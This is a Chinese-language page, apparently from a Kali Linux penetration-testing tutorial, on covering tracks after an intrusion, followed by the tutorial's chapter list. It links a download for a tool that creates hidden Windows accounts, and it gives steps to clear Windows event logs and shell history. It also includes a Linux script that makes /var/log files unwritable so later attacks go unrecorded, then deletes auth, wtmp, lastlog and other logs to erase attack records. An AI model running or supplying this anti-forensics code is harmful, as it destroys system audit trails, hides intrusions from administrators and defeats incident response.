**建立windows隱藏賬戶**
用一個小工具生成服務端,去上傳執行
鏈接:https://pan.baidu.com/s/18OIAWt4NXtX9-l1jBLeAng 密碼:v5oa
* * * * *
**刪除日志信息**
**WIndows:**
`eventvwr` 打開事件查看器刪除最近日志
* * * * *
**Linux:history -c**
寫個腳本:
**實現思路:**
1.查找系統和web組件日志
2.修改文件權限為不可寫入(后續攻擊中不記錄日志,重啟也不行)
3.刪除可能暴露我們行蹤的日志(刪除我們的攻擊記錄)
**代碼實現:**
~~~
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:~/bin
export PATH
#修改日志文件權限為不可寫
find /var/log? -name *.log | xargs chmod 551
cd /var/log && chmod 551 auth && chmod 551 auth.1 && chmod 551 messages && chmod 551 messages.1 && chmod 551 lastlog && chmod 551 wtmp && chmod 551 news
#刪除日志
find /var/log? -name *.log -mmin +300 | xargs rm -rf
cd /var/log && rm -rf auth.log && rm -rf auth.log.1 && rm -rf message && rm -rf message.1 && rm -rf lastlog && rm -rf wtmp && rm -rf news
# /var/log:日志存儲目錄
# -name *.log:log后綴的日志文件
# -mmin +300:300分鐘之前修改的文件
# xargs :將find命令查找到的文件列表作為參數,執行刪除操作
~~~
- 序言
- kali-Linux基本配置
- 忘記Root密碼
- 更新系統和軟件包
- Bash命令
- shell編程
- Linux的文件權限配置
- Linux日志文件
- 信息收集
- 被動信息收集
- 繞過CDN找真實IP
- IDS識別
- p0f-OS識別
- nmap端口掃描
- 搜索引擎
- 內網主機發現
- 使用SET社工包釣魚
- 漏洞發現
- Nessus策略漏掃
- AWVS集成漏掃
- w3af
- 其它漏掃
- 抓包改包
- Burpsite
- Fiddler
- Wireshark
- 漏洞利用
- Hydra爆破
- SQLmap
- Metasploit
- Beef
- antSwrod
- XSS前端工具
- Windows緩沖區溢出
- 后漏洞利用階段
- 免殺一句話
- 上傳工具
- 嗅探
- 本地提取
- 隱藏痕跡